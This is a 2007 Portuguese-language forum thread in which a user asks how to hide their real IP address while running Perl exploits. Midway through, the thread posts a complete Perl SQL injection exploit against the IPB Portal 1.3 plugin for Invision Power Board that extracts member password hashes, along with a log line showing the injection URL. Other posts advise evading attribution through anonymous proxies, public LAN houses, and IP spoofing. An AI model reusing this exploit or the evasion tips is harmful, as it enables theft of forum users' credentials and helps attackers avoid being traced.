Title: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 12 de February , 2007, 01:09:06 AM
Post by: Anonymous on 12 de February , 2007, 01:09:06 AM
Andei vendo alguns vídeos de ataques com exploits em perl.
Algum de vocês sabem como é feita a configuração de uma espécie de proxy para esconder seu real ip em um ataque? sejá no código a adicionar no .pl...
Algum de vocês sabem como é feita a configuração de uma espécie de proxy para esconder seu real ip em um ataque? sejá no código a adicionar no .pl...
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: lcs on 12 de February , 2007, 11:03:20 AM
Post by: lcs on 12 de February , 2007, 11:03:20 AM
bom naum tenho muito conhecimento nessa area. mais acho que usando um proxy anonimo da internet ou local mesmo ja deve reslver.. mais considero mais seguro fazer esse tipo de ação em redes publicas como numa lan house, ou outros do tipo, escolas de infomratica,etc..
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 12 de February , 2007, 03:01:27 PM
Post by: Anonymous on 12 de February , 2007, 03:01:27 PM
Nos testes que fiz de anda adiantaram para camuflar o real IP configurando um proxy inclusive para todos os protocolos... ;)
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Mental_Way on 12 de February , 2007, 05:55:23 PM
Post by: Mental_Way on 12 de February , 2007, 05:55:23 PM
Para vc poder ter acesso anonimo atráves de um Xpl em perl, vc pode se utilizar de técnicas como Ip Spoffing que serve para "mudar" o seu mac adress, porém vc pode querer acessar atráves de um proxy, para isso vc teria que entende como funciona o envio de requisição ao proxy e como ele te mandaria a resposta, para isso deveria saber como age a estrutura de um proxy (que é simplês)... E o que a linguagem perl proporciona para tal conexão....
Sem +...
Sem +...
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: branco on 12 de February , 2007, 06:14:22 PM
Post by: branco on 12 de February , 2007, 06:14:22 PM
depende do xpl, se for um pra webpages mesmo vc pode usar um simples proxy, em outras areas vc pode obter acesso a uma maquina servidora com proxy e utiliza-la para fazer o serviço,
t+
t+
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 12 de February , 2007, 11:21:24 PM
Post by: Anonymous on 12 de February , 2007, 11:21:24 PM
O exploit de exemplo é um feito para invision power board com o mod dragoran (alguma coisa assim)
branco já testei arrumar proxys em browser ou com programa e nenhum camufla o ataque direto com o exploit,
Acho que deve existir alguém código em perl para configurar proxy (depois dessa maratona de estudos que to passando) vou tentar aprender perl mas enquanto isso alguém ai pode me dar uma luz?
branco já testei arrumar proxys em browser ou com programa e nenhum camufla o ataque direto com o exploit,
Acho que deve existir alguém código em perl para configurar proxy (depois dessa maratona de estudos que to passando) vou tentar aprender perl mas enquanto isso alguém ai pode me dar uma luz?
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 13 de February , 2007, 03:33:18 AM
Post by: Anonymous on 13 de February , 2007, 03:33:18 AM
Seguinte cara como já disseram vc teria que criar uma rotina no exploit que conecta-se com o proxy,
e usar ip spofing acho q nao daria certo nao, porque ao mudar o ip, vc nao conseguia completar a conexão(se bem que me veio na cabeça umas gambiarras q talvez descem certo), o ip spofing daria certo se fosse conexão udp.
e usar ip spofing acho q nao daria certo nao, porque ao mudar o ip, vc nao conseguia completar a conexão(se bem que me veio na cabeça umas gambiarras q talvez descem certo), o ip spofing daria certo se fosse conexão udp.
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 13 de February , 2007, 05:40:17 AM
Post by: Anonymous on 13 de February , 2007, 05:40:17 AM
Sonics você entende de perl? poderia me passar uma rotina que se conecte com algum proxy? ou seria diferente em cada exploit? vlw 
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: branco on 13 de February , 2007, 11:51:06 AM
Post by: branco on 13 de February , 2007, 11:51:06 AM
meu amigo, mesmo que eu te passe o algoritmo de proxy nao vai funcionar porque o proxy que vc esta usando provavelmente nao esta funcionando corretamente, instale o hide ip que vai conseguir, se o ataque for direcionado a porta 80 ( no caso o ipb ) o proxy vai funcionar sim, t+
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 13 de February , 2007, 05:35:47 PM
Post by: Anonymous on 13 de February , 2007, 05:35:47 PM
Ok branco
1º - Com o ProxySwitcher selecionei o proxy e testei no meu próprio server.
2º - Tudo Certo no log...
"69.88.144.162 - - [13/Feb/2007:16:32:12 -0300] "GET / HTTP/1.0" 200 3453"
3º Agora no exploit faço um ataque no meu próprio server
perl ipb.pl 200.157.112.xxx /ipb/ 1
4º Vendo no log de conexões
200.157.112.xxx - - [13/Feb/2007:16:33:34 -0300] "GET /ipb/index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id=1/* HTTP/1.1" 404 302
5º Apareceu o meu real ip
1º - Com o ProxySwitcher selecionei o proxy e testei no meu próprio server.
2º - Tudo Certo no log...
"69.88.144.162 - - [13/Feb/2007:16:32:12 -0300] "GET / HTTP/1.0" 200 3453"
3º Agora no exploit faço um ataque no meu próprio server
perl ipb.pl 200.157.112.xxx /ipb/ 1
4º Vendo no log de conexões
200.157.112.xxx - - [13/Feb/2007:16:33:34 -0300] "GET /ipb/index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id=1/* HTTP/1.1" 404 302
5º Apareceu o meu real ip
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: branco on 13 de February , 2007, 06:41:44 PM
Post by: branco on 13 de February , 2007, 06:41:44 PM
pode me mostrar o codigo de fonte do xpl ?
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 13 de February , 2007, 09:58:56 PM
Post by: Anonymous on 13 de February , 2007, 09:58:56 PM
Code Select
#!/usr/bin/perl
###########################################
#IPB Portal 1.3->Invision Power Board plugin
#Created By SkOd
#SED security Team , http://sed-team.be
###########################################
#google:
#"Portal 1.3 by Dragoran"
###########################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
# IPB Portal 1.3 SQL injection Get Hash Exploit #
# Tested on Invision Power Board 1.3.0 #
# created By SkOd. SED Security Team #
############################################################
ipbpro.pl [HOST] [PATH] [Target id]
ipbpro.pl www.host.com /forum/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$path2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Exploit Failed\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}Obrigado branco pela ajuda
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: branco on 13 de February , 2007, 10:33:20 PM
Post by: branco on 13 de February , 2007, 10:33:20 PM
o unico erro que possa ser pelo que vi no exploit é a falta de http:// na frente do host, teste ai e se nao der eu vo implementar o proxy no xpl pra vc poder usar, ate
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 13 de February , 2007, 11:02:02 PM
Post by: Anonymous on 13 de February , 2007, 11:02:02 PM
Não deu certo continuou a mesma coisa ;)
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 14 de February , 2007, 03:46:32 AM
Post by: Anonymous on 14 de February , 2007, 03:46:32 AM
Quote from: "Dragão Noturno"Não deu certo continuou a mesma coisa ;)
Mas é claro q nao ia dar certo, tem que ter a rotina do proxy no proprio exploit, e tipo eu nao manjo de perl ainda, mas o que eu posso fazer é tentar achar um code pronto de proxy em perl e vc adaptar no exploit, ou achar o algoritmo do mesmo.
flw
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 14 de February , 2007, 04:05:31 AM
Post by: Anonymous on 14 de February , 2007, 04:05:31 AM
http://www.cis.upenn.edu/sdt/proxy.pl (http://www.cis.upenn.edu/sdt/proxy.pl)
http://www.adp-gmbh.ch/perl/proxy.html (http://www.adp-gmbh.ch/perl/proxy.html)
http://www.adp-gmbh.ch/perl/proxy.html (http://www.adp-gmbh.ch/perl/proxy.html)
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: Anonymous on 15 de February , 2007, 11:16:49 PM
Post by: Anonymous on 15 de February , 2007, 11:16:49 PM
Opa vlw vou dar uma estudada e posto aqui o resultado vlw mesmo Sonics, branco...
Title: Re: Como esconder o IP em um ataque com exploit em perl ?
Post by: fast on 09 de September , 2007, 05:13:55 AM
Post by: fast on 09 de September , 2007, 05:13:55 AM
lcs , não sei se vc faz deface ou o que , mais imagina sair de casa pra ir pruma lan house a cada vez que foi rodar um xpl ? IAHOEIAOHA ta loco fy
nunca tinha pensado muito nisso do proxy , mais acredito que pelo menos na cmd.exe do windows botando no internet explorer a configuração pra proxy local o cmd já estaria embutido , não custa fazer uns testes..
se não me engano no linux não é assim , tem que testar desse jeito que falei nos dois S.O
nunca tinha pensado muito nisso do proxy , mais acredito que pelo menos na cmd.exe do windows botando no internet explorer a configuração pra proxy local o cmd já estaria embutido , não custa fazer uns testes..
se não me engano no linux não é assim , tem que testar desse jeito que falei nos dois S.O